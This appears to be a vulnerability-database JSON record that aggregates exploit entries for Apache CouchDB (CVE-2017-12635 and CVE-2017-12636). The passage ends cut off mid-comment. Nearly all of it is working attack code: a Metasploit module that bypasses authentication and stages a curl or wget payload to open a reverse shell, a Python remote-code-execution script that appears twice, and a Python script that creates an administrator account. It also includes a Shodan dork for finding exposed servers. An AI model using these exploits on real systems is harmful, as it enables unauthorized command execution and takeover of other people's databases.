"2018-07-13T19:08:44", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-07-13T00:00:00", "id": "EDB-ID:45019", "href": "https://www.exploit-db.com/exploits/45019/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache CouchDB Arbitrary Command Execution',\r\n 'Description' => %q{\r\n CouchDB administrative users can configure the database server via HTTP(S).\r\n Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.\r\n This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,\r\n including downloading and executing scripts from the public internet.\r\n },\r\n 'Author' => [\r\n 'Max Justicz', # CVE-2017-12635 Vulnerability discovery\r\n 'Joan Touzet', # CVE-2017-12636 Vulnerability discovery\r\n 'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-12636'],\r\n ['CVE', '2017-12635'],\r\n ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],\r\n ['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],\r\n ['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']\r\n ],\r\n 'DisclosureDate' => 'Apr 6 2016',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'linux/x64/shell_reverse_tcp',\r\n 'CMDSTAGER::FLAVOR' => 'curl'\r\n },\r\n 'CmdStagerFlavor' => ['curl', 'wget'],\r\n 'Targets' => [\r\n ['Automatic', {}],\r\n ['Apache CouchDB version 1.x', {}],\r\n ['Apache CouchDB version 2.x', {}]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(5984),\r\n OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),\r\n OptString.new('HttpUsername', [false, 'The username to login as']),\r\n OptString.new('HttpPassword', [false, 'The password to login with'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),\r\n OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n get_version\r\n version = Gem::Version.new(@version)\r\n return CheckCode::Unknown if version.version.empty?\r\n vprint_status \"Found CouchDB version #{version}\"\r\n\r\n return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n fail_with(Failure::Unknown, \"Something went horribly wrong and we couldn't continue to exploit.\") unless get_version\r\n version = @version\r\n\r\n vprint_good(\"#{peer} - Authorization bypass successful\") if auth_bypass\r\n\r\n print_status(\"Generating #{datastore['CMDSTAGER::FLAVOR']} command stager\")\r\n @cmdstager = generate_cmdstager(\r\n temp: datastore['WritableDir'],\r\n file: File.basename(cmdstager_path)\r\n ).join(';')\r\n\r\n register_file_for_cleanup(cmdstager_path)\r\n\r\n if !datastore['Attempts'] || datastore['Attempts'] <= 0\r\n attempts = 1\r\n else\r\n attempts = datastore['Attempts']\r\n end\r\n\r\n attempts.times do |i|\r\n print_status(\"#{peer} - The #{i + 1} time to exploit\")\r\n send_payload(version)\r\n Rex.sleep(5)\r\n # break if we get the shell\r\n break if session_created?\r\n end\r\n end\r\n\r\n # CVE-2017-12635\r\n # The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,\r\n # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization\r\n # for the newly created user.\r\n def auth_bypass\r\n username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n @auth = basic_auth(username, password)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_users/org.couchdb.user:#{username}\"),\r\n 'method' => 'PUT',\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"type\": \"user\",\"name\": \"#{username}\",\"roles\": [\"_admin\"],\"roles\": [],\"password\": \"#{password}\"})\r\n )\r\n\r\n if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def get_version\r\n @version = nil\r\n\r\n begin\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n rescue Rex::ConnectionError\r\n vprint_bad(\"#{peer} - Connection failed\")\r\n return false\r\n end\r\n\r\n unless res\r\n vprint_bad(\"#{peer} - No response, check if it is CouchDB. \")\r\n return false\r\n end\r\n\r\n if res && res.code == 401\r\n print_bad(\"#{peer} - Authentication required.\")\r\n return false\r\n end\r\n\r\n if res && res.code == 200\r\n res_json = res.get_json_document\r\n\r\n if res_json.empty?\r\n vprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\")\r\n return false\r\n end\r\n\r\n @version = res_json['version'] if res_json['version']\r\n return true\r\n end\r\n\r\n vprint_warning(\"#{peer} - Version not found\")\r\n return true\r\n end\r\n\r\n def send_payload(version)\r\n vprint_status(\"#{peer} - CouchDB version is #{version}\") if version\r\n\r\n version = Gem::Version.new(@version)\r\n if version.version.empty?\r\n vprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\")\r\n # if target set Automatic, exploit failed.\r\n if target == targets[0]\r\n fail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\")\r\n elsif target == targets[1]\r\n payload1\r\n elsif target == targets[2]\r\n payload2\r\n end\r\n elsif version < Gem::Version.new('1.7.0')\r\n payload1\r\n elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n payload2\r\n elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')\r\n fail_with(Failure::NotVulnerable, \"#{peer} - The target is not vulnerable.\")\r\n end\r\n end\r\n\r\n # Exploit with multi requests\r\n # payload1 is for the version of couchdb below 1.7.0\r\n def payload1\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd1}\",\"map\":\"\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd2}\",\"map\":\"\"})\r\n )\r\n end\r\n\r\n # payload2 is for the version of couchdb below 2.1.1\r\n def payload2\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_membership\"),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n\r\n node = res.get_json_document['all_nodes'][0]\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd1}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd2}\"})\r\n )\r\n end\r\n\r\n def cmdstager_path\r\n @cmdstager_path ||=\r\n \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}\"\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45019/"}, {"lastseen": "2018-06-20T12:45:35", "osvdbidlist": [], "references": [], "description": "Apache CouchDB < 2.1.0 - Remote Code Execution. CVE-2017-12636. Webapps exploit for Linux platform", "edition": 1, "reporter": "Exploit-DB", "published": "2018-06-20T00:00:00", "title": "Apache CouchDB < 2.1.0 - Remote Code Execution", "type": "exploitdb", "enchantments": {"score": {"modified": "2018-06-20T12:45:35", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-06-20T00:00:00", "id": "EDB-ID:44913", "href": "https://www.exploit-db.com/exploits/44913/", "sourceData": "# Title: Apache CouchDB < 2.1.0 - Remote Code Execution\r\n# Author: Cody Zacharias\r\n# Shodan Dork: port:5984\r\n# Vendor Homepage: http://couchdb.apache.org/\r\n# Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/\r\n# Version: <= 1.7.0 and 2.x - 2.1.0\r\n# Tested on: Debian\r\n# CVE : CVE-2017-12636\r\n# References: \r\n# https://justi.cz/security/2017/11/14/couchdb-rce-npm.html\r\n# https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/\r\n\r\n# Proof of Concept: python exploit.py --priv -c \"id\" http://localhost:5984\r\n\r\n#!/usr/bin/env python\r\nfrom requests.auth import HTTPBasicAuth\r\nimport argparse\r\nimport requests\r\nimport re\r\nimport sys\r\n\r\ndef getVersion():\r\n version = requests.get(args.host).json()[\"version\"]\r\n return version\r\n\r\ndef error(message):\r\n print(message)\r\n sys.exit(1)\r\n\r\ndef exploit(version):\r\n with requests.session() as session:\r\n session.headers = {\"Content-Type\": \"application/json\"}\r\n\r\n # Exploit privilege escalation\r\n if args.priv:\r\n try:\r\n payload = '{\"type\": \"user\", \"name\": \"'\r\n payload += args.user\r\n payload += '\", \"roles\": [\"_admin\"], \"roles\": [],'\r\n payload += '\"password\": \"' + args.password + '\"}'\r\n\r\n pr = session.put(args.host + \"/_users/org.couchdb.user:\" + args.user,\r\n data=payload)\r\n\r\n print(\"[+] User \" + args.user + \" with password \" + args.password + \" successfully created.\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to create the user on remote host.\")\r\n\r\n session.auth = HTTPBasicAuth(args.user, args.password)\r\n\r\n # Create payload\r\n try:\r\n if version == 1:\r\n session.put(args.host + \"/_config/query_servers/cmd\",\r\n data='\"' + args.cmd + '\"')\r\n print(\"[+] Created payload at: \" + args.host + \"/_config/query_servers/cmd\")\r\n else:\r\n host = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0]\r\n session.put(args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\",\r\n data='\"' + args.cmd + '\"')\r\n print(\"[+] Created payload at: \" + args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\")\r\n except requests.exceptions.HTTPError as e:\r\n error(\"[-] Unable to create command payload: \" + e)\r\n\r\n try:\r\n session.put(args.host + \"/god\")\r\n session.put(args.host + \"/god/zero\", data='{\"_id\": \"HTP\"}')\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to create database.\")\r\n\r\n # Execute payload\r\n try:\r\n if version == 1:\r\n session.post(args.host + \"/god/_temp_view?limit=10\",\r\n data='{\"language\": \"cmd\", \"map\": \"\"}')\r\n else:\r\n session.post(args.host + \"/god/_design/zero\",\r\n data='{\"_id\": \"_design/zero\", \"views\": {\"god\": {\"map\": \"\"} }, \"language\": \"cmd\"}')\r\n print(\"[+] Command executed: \" + args.cmd)\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to execute payload.\")\r\n\r\n print(\"[*] Cleaning up.\")\r\n\r\n # Cleanup database\r\n try:\r\n session.delete(args.host + \"/god\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to remove database.\")\r\n\r\n # Cleanup payload\r\n try:\r\n if version == 1:\r\n session.delete(args.host + \"/_config/query_servers/cmd\")\r\n else:\r\n host = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0]\r\n session.delete(args.host + \"/_node\" + host + \"/_config/query_servers/cmd\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to remove payload.\")\r\n\r\ndef main():\r\n version = getVersion()\r\n print(\"[*] Detected CouchDB Version \" + version)\r\n vv = version.replace(\".\", \"\")\r\n v = int(version[0])\r\n if v == 1 and int(vv) <= 170:\r\n exploit(v)\r\n elif v == 2 and int(vv) < 211:\r\n exploit(v)\r\n else:\r\n print(\"[-] Version \" + version + \" not vulnerable.\")\r\n sys.exit(0)\r\n\r\nif __name__ == \"__main__\":\r\n ap = argparse.ArgumentParser(\r\n description=\"Apache CouchDB JSON Remote Code Execution Exploit (CVE-2017-12636)\")\r\n ap.add_argument(\"host\", help=\"URL (Example: http://127.0.0.1:5984).\")\r\n ap.add_argument(\"-c\", \"--cmd\", help=\"Command to run.\")\r\n ap.add_argument(\"--priv\", help=\"Exploit privilege escalation (CVE-2017-12635).\",\r\n action=\"store_true\")\r\n ap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: guest).\",\r\n default=\"guest\")\r\n ap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: guest).\",\r\n default=\"guest\")\r\n args = ap.parse_args()\r\n main()", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44913/"}], "packetstorm": [{"lastseen": "2018-04-24T09:30:29", "references": [], "description": "", "edition": 1, "reporter": "Sebastian Castro", "published": "2018-04-23T00:00:00", "type": "packetstorm", "title": "Apache CouchDB 1.7.0 / 2.x Remote Privilege Escalation", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-04-23T00:00:00", "href": "https://packetstormsecurity.com/files/147295/Apache-CouchDB-1.7.0-2.x-Remote-Privilege-Escalation.html", "id": "PACKETSTORM:147295", "sourceData": "`# Exploit Title: Apache CouchDB JSON 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation \n# Date: 2017-08-07 \n# Exploit Author: SebastiA!n Castro @r4wd3r \n# Vendor Homepage: https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/ \n# Software Link: http://couchdb.apache.org/ \n# Version: Apache CouchDB 1.7.0 and 2.x before 2.1.1 \n# CVE : CVE-2017-12635 \n \n#!/usr/bin/env python \n \nimport argparse \nimport re \nimport sys \nimport requests \n \nparser = argparse.ArgumentParser( \ndescription='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' + \n' (CVE-2017-12635)') \nparser.add_argument('host', help='Host to attack.', type=str) \nparser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984') \nparser.add_argument('-u', '--user', help='Username to create as admin.', \ntype=str, default='couchara') \nparser.add_argument('-P', '--password', help='Password of the created user.', \ntype=str, default='couchapass') \nargs = parser.parse_args() \n \nhost = args.host \nport = args.port \nuser = args.user \npassword = args.password \n \npat_ip = re.compile(\"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$\") \nif not pat_ip.match(host): \nprint \"[x] Wrong host. Must be a valid IP address.\" \nsys.exit(1) \n \nprint \"[+] User to create: \" + user \nprint \"[+] Password: \" + password \nprint \"[+] Attacking host \" + host + \" on port \" + port \n \nurl = 'http://' + host + ':' + port \n \ntry: \nrtest = requests.get(url, timeout=10) \nexcept requests.exceptions.Timeout: \nprint \"[x] Server is taking too long to answer. Exiting.\" \nsys.exit(1) \nexcept requests.ConnectionError: \nprint \"[x] Unable to connect to the remote host.\" \nsys.exit(1) \n \n# Payload for creating user \ncu_url_payload = url + \"/_users/org.couchdb.user:\" + user \ncu_data_payload = '{\"type\": \"user\", \"name\": \"'+user+'\", \"roles\": [\"_admin\"], \"roles\": [], \"password\": \"'+password+'\"}' \n \ntry: \nrcu = requests.put(cu_url_payload, data=cu_data_payload) \nexcept requests.exceptions.HTTPError: \nprint \"[x] ERROR: Unable to create the user on remote host.\" \nsys.exit(1) \n \nif rcu.status_code == 201: \nprint \"[+] User \" + user + \" with password \" + password + \"successfully created.\" \nsys.exit(0) \nelse: \nprint \"[x] ERROR \" + rcu.status_code + \": Unable to create the user on remote host.\" \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147295/apachecouchdb1702x-escalate.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-23T09:28:55", "references": [], "description": "", "edition": 1, "reporter": "Cody Zacharias", "published": "2018-06-21T00:00:00", "title": "Apache CouchDB Remote Code Execution", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-06-23T09:28:55", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-06-21T00:00:00", "id": "PACKETSTORM:148273", "href": "https://packetstormsecurity.com/files/148273/Apache-CouchDB-Remote-Code-Execution.html", "sourceData": "`# Title: Apache CouchDB < 2.1.0 - Remote Code Execution \n# Author: Cody Zacharias \n# Shodan Dork: port:5984 \n# Vendor Homepage: http://couchdb.apache.org/ \n# Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/ \n# Version: <= 1.7.0 and 2.x - 2.1.0 \n# Tested on: Debian \n# CVE : CVE-2017-12636 \n# References: \n# https://justi.cz/security/2017/11/14/couchdb-rce-npm.html \n# https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/ \n \n# Proof of Concept: python exploit.py --priv -c \"id\" http://localhost:5984 \n \n#!/usr/bin/env python \nfrom requests.auth import HTTPBasicAuth \nimport argparse \nimport requests \nimport re \nimport sys \n \ndef getVersion(): \nversion = requests.get(args.host).json()[\"version\"] \nreturn version \n \ndef error(message): \nprint(message) \nsys.exit(1) \n \ndef exploit(version): \nwith requests.session() as session: \nsession.headers = {\"Content-Type\": \"application/json\"} \n \n# Exploit privilege escalation \nif args.priv: \ntry: \npayload = '{\"type\": \"user\", \"name\": \"' \npayload += args.user \npayload += '\", \"roles\": [\"_admin\"], \"roles\": [],' \npayload += '\"password\": \"' + args.password + '\"}' \n \npr = session.put(args.host + \"/_users/org.couchdb.user:\" + args.user, \ndata=payload) \n \nprint(\"[+] User \" + args.user + \" with password \" + args.password + \" successfully created.\") \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to create the user on remote host.\") \n \nsession.auth = HTTPBasicAuth(args.user, args.password) \n \n# Create payload \ntry: \nif version == 1: \nsession.put(args.host + \"/_config/query_servers/cmd\", \ndata='\"' + args.cmd + '\"') \nprint(\"[+] Created payload at: \" + args.host + \"/_config/query_servers/cmd\") \nelse: \nhost = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0] \nsession.put(args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\", \ndata='\"' + args.cmd + '\"') \nprint(\"[+] Created payload at: \" + args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\") \nexcept requests.exceptions.HTTPError as e: \nerror(\"[-] Unable to create command payload: \" + e) \n \ntry: \nsession.put(args.host + \"/god\") \nsession.put(args.host + \"/god/zero\", data='{\"_id\": \"HTP\"}') \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to create database.\") \n \n# Execute payload \ntry: \nif version == 1: \nsession.post(args.host + \"/god/_temp_view?limit=10\", \ndata='{\"language\": \"cmd\", \"map\": \"\"}') \nelse: \nsession.post(args.host + \"/god/_design/zero\", \ndata='{\"_id\": \"_design/zero\", \"views\": {\"god\": {\"map\": \"\"} }, \"language\": \"cmd\"}') \nprint(\"[+] Command executed: \" + args.cmd) \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to execute payload.\") \n \nprint(\"[*] Cleaning up.\") \n \n# Cleanup database \ntry: \nsession.delete(args.host + \"/god\") \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to remove database.\") \n \n# Cleanup payload \ntry: \nif version == 1: \nsession.delete(args.host + \"/_config/query_servers/cmd\") \nelse: \nhost = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0] \nsession.delete(args.host + \"/_node\" + host + \"/_config/query_servers/cmd\") \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to remove payload.\") \n \ndef main(): \nversion = getVersion() \nprint(\"[*] Detected CouchDB Version \" + version) \nvv = version.replace(\".\", \"\") \nv = int(version[0]) \nif v == 1 and int(vv) <= 170: \nexploit(v) \nelif v == 2 and int(vv) < 211: \nexploit(v) \nelse: \nprint(\"[-] Version \" + version + \" not vulnerable.\") \nsys.exit(0) \n \nif __name__ == \"__main__\": \nap = argparse.ArgumentParser( \ndescription=\"Apache CouchDB JSON Remote Code Execution Exploit (CVE-2017-12636)\") \nap.add_argument(\"host\", help=\"URL (Example: http://127.0.0.1:5984).\") \nap.add_argument(\"-c\", \"--cmd\", help=\"Command to run.\") \nap.add_argument(\"--priv\", help=\"Exploit privilege escalation (CVE-2017-12635).\", \naction=\"store_true\") \nap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: guest).\", \ndefault=\"guest\") \nap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: guest).\", \ndefault=\"guest\") \nargs = ap.parse_args() \nmain() \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148273/apachecouchdb-exec.txt"}, {"lastseen": "2018-07-13T01:33:32", "references": [], "description": "", "edition": 1, "reporter": "Max Justicz", "published": "2018-07-12T00:00:00", "title": "Apache CouchDB Arbitrary Command Execution", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-07-13T01:33:32", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-07-12T00:00:00", "id": "PACKETSTORM:148535", "href": "https://packetstormsecurity.com/files/148535/Apache-CouchDB-Arbitrary-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache CouchDB Arbitrary Command Execution', \n'Description' => %q{ \nCouchDB administrative users can configure the database server via HTTP(S). \nSome of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. \nThis allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, \nincluding downloading and executing scripts from the public internet. \n}, \n'Author' => [ \n'Max Justicz', # CVE-2017-12635 Vulnerability discovery \n'Joan Touzet', # CVE-2017-12636 Vulnerability discovery \n'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module \n], \n'References' => [ \n['CVE', '2017-12636'], \n['CVE', '2017-12635'], \n['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'], \n['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'], \n['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E'] \n], \n'DisclosureDate' => 'Apr 6 2016', \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/shell_reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'curl' \n}, \n'CmdStagerFlavor' => ['curl', 'wget'], \n'Targets' => [ \n['Automatic', {}], \n['Apache CouchDB version 1.x', {}], \n['Apache CouchDB version 2.x', {}] \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options([ \nOpt::RPORT(5984), \nOptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']), \nOptString.new('HttpUsername', [false, 'The username to login as']), \nOptString.new('HttpPassword', [false, 'The password to login with']) \n]) \n \nregister_advanced_options([ \nOptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']), \nOptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp']) \n]) \nend \n \ndef check \nget_version \nversion = Gem::Version.new(@version) \nreturn CheckCode::Unknown if version.version.empty? \nvprint_status \"Found CouchDB version #{version}\" \n \nreturn CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0')) \n \nCheckCode::Safe \nend \n \ndef exploit \nfail_with(Failure::Unknown, \"Something went horribly wrong and we couldn't continue to exploit.\") unless get_version \nversion = @version \n \nvprint_good(\"#{peer} - Authorization bypass successful\") if auth_bypass \n \nprint_status(\"Generating #{datastore['CMDSTAGER::FLAVOR']} command stager\") \n@cmdstager = generate_cmdstager( \ntemp: datastore['WritableDir'], \nfile: File.basename(cmdstager_path) \n).join(';') \n \nregister_file_for_cleanup(cmdstager_path) \n \nif !datastore['Attempts'] || datastore['Attempts'] <= 0 \nattempts = 1 \nelse \nattempts = datastore['Attempts'] \nend \n \nattempts.times do |i| \nprint_status(\"#{peer} - The #{i + 1} time to exploit\") \nsend_payload(version) \nRex.sleep(5) \n# break if we get the shell \nbreak if session_created? \nend \nend \n \n# CVE-2017-12635 \n# The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, \n# the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization \n# for the 